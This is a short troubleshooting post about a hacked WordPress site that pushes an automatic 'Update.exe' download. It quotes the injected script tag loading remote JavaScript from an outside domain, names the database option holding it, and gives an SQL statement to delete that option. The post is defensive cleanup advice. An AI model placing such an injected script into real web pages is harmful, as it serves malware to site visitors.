Problem :
When you open wordpress site Update.Exe will popup and download automatically.
If You find source it will show this : There’s a downloading of a update.exe initiated by line <script src="//socialstatsplugin.com/jqury.js"></script>
Solution :
Login to Database through PHPMyadmin
In your wp_options (orwp_ID_options on multisite) there’s a row / option called ‘wp_data_newa’. Will investigate further to see who’s responsible for this but for now you can (temporarily!) fix it by removing it with an SQL statement:
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
Make sure to adjust your table prefix.
Good Luck
